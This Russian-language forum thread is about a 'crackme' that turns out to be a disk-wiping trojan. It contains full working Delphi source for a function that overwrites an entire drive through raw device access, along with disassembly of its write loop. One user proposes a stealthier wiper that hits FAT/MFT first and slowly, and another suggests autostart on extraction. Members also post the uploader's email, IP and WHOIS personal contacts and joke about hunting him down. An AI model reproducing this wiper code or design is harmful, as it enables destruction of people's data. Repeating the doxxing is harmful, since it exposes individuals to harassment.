Этот крякми написан на дельфи и весит всего 15 килобайт, но вам его никогда не взломать, так как там настолько офигенная защита, что вы все рагьше повеситесь чем его взломаете.
Ну а если кто взломает, то это будет настоящий великий гуру кракинга!
Давайте зацените!!!

// DELETED by -= ALEX =-

| Сообщение посчитали полезным:

НЕ ЗАПУСКАЙТЕ ЭТУ ЗАРАЗУ, ОНА НАКРЫВАЕТ КАК МИНИМУМ ОС!
ЗЫ А этого урода надо, пожалуй, забанить.

-----
Всем привет, я вернулся

| Сообщение посчитали полезным:

Мыло его:
SadiST2004@yandex.ru

| Сообщение посчитали полезным:

IP 81.2.59.171

| Сообщение посчитали полезным:

f489_CrackMe.rar - модераторы, может убрать этот МУСОР. Мало ли чего...

-----
Сколько ни наталкивали на мысль – все равно сумел увернуться

| Сообщение посчитали полезным:

Вот ещё бы домашний адрес

0040374A  |> 6A 00          /push    0                                          ; /pOverlapped = NULL

0040374C  |. 8D45 F4        |lea     eax, dword ptr ss:[ebp-C]                  ; |

0040374F  |. 50             |push    eax                                        ; |pBytesWritten

00403750  |. 57             |push    edi                                        ; |nBytesToWrite

00403751  |. 8B45 F8        |mov     eax, dword ptr ss:[ebp-8]                  ; |

00403754  |. 50             |push    eax                                        ; |Buffer = 00830038

00403755  |. 56             |push    esi                                        ; |hFile

00403756  |. E8 C9FEFFFF    |call    <jmp.&kernel32.WriteFile>                  ; \WriteFile

0040375B  |. 4B             |dec     ebx

0040375C  |.^75 EC          \jnz     short CrackMe.0040374A

В EBX на входе в цикл 00010F26 (69414d)
Что бы это могло значить?

Надо же быть такой редиской.

-----
Всем привет, я вернулся

| Сообщение посчитали полезным:

Отдизасмил этот крякми, посмотрел, показалось весьма знакомым...
В исходнике этот кож выглядел так:

{

 Затирание нахрен раздела на винте.

 Drive - буква уничтожаемого диска.

 Функция возвращает успешность выполнения своей черной работы.

 За использование в незаконных целях

 автор не отвечает (сидеть сами будете).

}

function DieHard(Drive: Char): boolean;

var

 hFile: dword;

 Buff: pointer;

 Written: dword;

 DiskSize: int64;

 SectorsPerCluster,

 BytesPerSector,

 FreeClusters,

 Clusters: dword;

 BuffSize, r: dword;

begin

  Result := false;

  hFile := CreateFile(PChar('\\.\' + Drive +':'), GENERIC_WRITE,

                      FILE_SHARE_READ or FILE_SHARE_WRITE,

                      nil, OPEN_EXISTING, 0, 0);

  if hFile = INVALID_HANDLE_VALUE then Exit;

  GetDiskFreeSpace(PChar(Drive + ':\'), SectorsPerCluster,

                   BytesPerSector, FreeClusters, Clusters);

  DiskSize := SectorsPerCluster * BytesPerSector * Clusters;

  BuffSize := SectorsPerCluster * BytesPerSector * 10;

  GetMem(Buff, BuffSize);

  for r := 0 to DiskSize div BuffSize do

   WriteFile(hFile, Buff^, BuffSize, Written, nil);

  FreeMem(Buff);

  CloseHandle(hFile);

  Result := true;

end;

Этот код я выкладывал на форуме васма недели две назад...
Приношу всем пострадавшим свои глубокие соболезнования...

-----
Скажем дружно - нафиг нужно.

| Сообщение посчитали полезным:

А вам ник ничего не напоминает?Я сам немного лажанулся. ;) Эта зараза убила fat раздел...

| Сообщение посчитали полезным:

Ms-Rem
Так надо бы drГолове отправить, как вирус и в drWeb послать.

-----
Всем привет, я вернулся

| Сообщение посчитали полезным:

Еще раз приношу всем свои извинения...

-----
Скажем дружно - нафиг нужно.

| Сообщение посчитали полезным:

Ms-Rem пишет:
Еще раз приношу всем свои извинения...

Да ладно тебе извиняться, дырку то не ты создал .
Это как раз хорошо, потому что идея так глупо реализована... Хотя лучше не буду объяснять, как оно могло нанести мне вред .
ЗЫ Конечно, если на работе запустить такую хрень, мало не покажется.

-----
Всем привет, я вернулся

| Сообщение посчитали полезным:

Да, уничтожение раздела весьма примитивное, если делать основательно, то нужно определять место жизненно важных областей раздела (FAT, MFT) и затирать в первую очередь их. Также это стоит делать замедленно, чтобы было незаметно. В это время прога должна выполнять что-нибудь отвлекающее. Или лучше запустить форматирующий поток в другом процессе. Тогда это будет полный пи#дец.
Если кто интересуется, то могу и такую хрень накатать.

-----
Скажем дружно - нафиг нужно.

| Сообщение посчитали полезным:

Ms-Rem пишет:
Да, уничтожение раздела весьма примитивное, если делать основательно, то нужно определять место жизненно важных областей раздела (FAT, MFT) и затирать в первую очередь их. Также это стоит делать замедленно, чтобы было незаметно. В это время прога должна выполнять что-нибудь отвлекающее. Или лучше запустить форматирующий поток в другом процессе. Тогда это будет полный пи#дец.
Если кто интересуется, то могу и такую хрень накатать.
Это что прикол, может еще расскажешь, как атомные бомбы собирать...
Исходники выложить, а это уже не исследование, а распространение вредоносных программ.
Такие вещи нужно, если и объяснять, то на пальцах, а не готовые программы выкладывать.

Модераторы, уберите аттач f489_CrackMe.rar, это г**но не должно дальше расходиться.

-----
Сколько ни наталкивали на мысль – все равно сумел увернуться

| Сообщение посчитали полезным:

Ms-Rem
Накатай!...Еще лучше - извлекаешь из архива(что бы отдизасмить напр.) и он автостартует

| Сообщение посчитали полезным:

Фпесду, а то потом еще убьют на улице...

-----
Скажем дружно - нафиг нужно.

| Сообщение посчитали полезным:

Офигенный CRACKME для ностоящих кракеров.
достаточно посмотреть на название топика, чтобы понять что сообщение это писал какой-нибудь школьник =) такое лучше не запускать ;]

| Сообщение посчитали полезным:

// DELETED by -= ALEX =-[i]
Спасибо, вот это дело.

-----
Сколько ни наталкивали на мысль – все равно сумел увернуться

| Сообщение посчитали полезным:

Ух, епт!

-----
TBR

| Сообщение посчитали полезным:

Можно как нить сделать чтоб он пока на форум не заходил?

-----
TBR

| Сообщение посчитали полезным:

WELL пишет:
81.2.59.171
Адрес прова - Владивосток, Проезд Комарова 36, тел: +7 4232 406040, факс: +7 4232 406029
ПРОВ - POL-DIALUP-NET, POL Dialup Lines,
Осталось тока вычислить номер телефона, который был под сим IP 19 Мая 9:54 по Москве (17:54 по Владику, если не ошибаюсь). И мона ехать, МАЧИТЬ извращенца........

-----
Ни одно доброе дело не должно остаться безнаказанным !!!

| Сообщение посчитали полезным:

Ну что, кто нить из Владивастока есть?

inetnum: 81.2.56.0 - 81.2.63.255
netname: POL-DIALUP-NET
descr: POL Dialup Lines
country: RU
admin-c: KKU1-RIPE
tech-c: GAV2-RIPE
status: ASSIGNED PA
mnt-by: PRIMORYE-NCC-MNT
changed: gav@vmts.ru 20021227
source: RIPE

route: 81.2.32.0/19
descr: PRIMORYE NET
origin: AS12332
notify: noc@vmts.ru
mnt-by: PRIMORYE-NCC-MNT
changed: gav@vmts.ru 20030129
source: RIPE

person: Konstantin U Kaplin
address: VMTS
address: 36, pr. Komarova st.
address: 690950 Vladivostok, Russia
phone: +7 4232 406040
fax-no: +7 4232 406029
e-mail: kku@vmts.ru
mnt-by: PRIMORYE-NCC-MNT
nic-hdl: KKU1-RIPE
remarks: Network Administrator of VMTS
changed: gav@vmts.ru 19980916
changed: gav@vmts.ru 20011108
source: RIPE

person: Alexei V Golovin
address: 36, pr. Komarova st.
address: 690950 Vladivostok, Russia
phone: +7 4232 406040
fax-no: +7 4232 406029
e-mail: gav@prim.dsv.ru
mnt-by: PRIMORYE-NCC-MNT
nic-hdl: GAV2-RIPE
remarks: Network Administrator of PoL
changed: gav@vmts.ru 19980119
changed: gav@vmts.ru 20011108
changed: gav@vmts.ru 20030708
changed: gav@prim.dsv.ru 20031223
source: RIPE


Диал-апщик из Владивастока. Пользуется услугами провайдера PRIMORYE-NCC-MNT который находится по адресу 690950 Россия, г. Владивасток, пр. Комарова, 36. тел. +7 4232 406040, факс +7 4232 406029

Админы:
Константин Каплин kku@vmts.ru
Алексей Головин gav@prim.dsv.ru

-----
TBR

| Сообщение посчитали полезным:

[EXE]_cutor


-----
TBR

| Сообщение посчитали полезным:

Grey пишет:
Ну что, кто нить из Владивастока есть?
дык вот Рем и есть откуда-то оттуда... из лога мирка:

* Quits: Ms-Rem (_Rem_@Street-AFA91BD2.dialup.primorye.ru) (Ping timeout)

| Сообщение посчитали полезным:

Mario555 пишет:
дык вот Рем и есть откуда-то оттуда... из лога мирка:
Угу, еще некто Korvin, BC и mcdemon оттудова-же

| Сообщение посчитали полезным:

Mario555 пишет:
(_Rem_@Street-AFA91BD2.dialup.primorye.ru

domain: PRIMORYE.RU
type: PUBLIC
nserver: ns.vmts.ru.
nserver: ns2.vmts.ru.
state: REGISTERED, DELEGATED
org: Primorsky region Brancn Joint Stock Company "Dalsvyaz"
phone: +7 4232 267405
fax-no: +7 4232 406029
e-mail: noc@primorye.ru
e-mail: igg@prim.dsv.ru
registrar: RUCENTER-REG-RIPN
created: 1997.10.22
paid-till: 2005.12.01
source: TC-RIPN

Ara пишет:
еще некто Korvin, BC и mcdemon оттудова-же
А о них что есть?

-----
TBR

| Сообщение посчитали полезным:

Grey пишет:
А о них что есть?
Хм, зайди на канал, кто-нить логи кинет. У меня не сохраняются логи.

| Сообщение посчитали полезным:

Grey
ГЫ, лог похож на XSpider'овский. Я его юзал
Ara пишет:
Угу, еще некто Korvin, BC и mcdemon оттудова-же
УСЁ, писец мазахисту. Одним програмером на земле сёдня меньше стало
PS ещё над мылом мона поиздеваться.............

-----
Ни одно доброе дело не должно остаться безнаказанным !!!

| Сообщение посчитали полезным:

У меня на фатовском разделе была одна единственная прога(не считая части моего диплома,)которой очень жалко -IDA 4.7 под Линукс.Качал с soft.0zones.com/. Сейчас этот сайт в даунах,неможет кто дать ссылку откуда ее можно скачать?Спасибо.

| Сообщение посчитали полезным:

4.8 недавно test кусками по 3 метра выкладывал. Ищи........

-----
Ни одно доброе дело не должно остаться безнаказанным !!!

| Сообщение посчитали полезным:

а что, всякие антивирусники такие приколы не пропаливают? сам-то не запускал файло.. просто интересно.

-----
Пиво, сиськи, транс

| Сообщение посчитали полезным: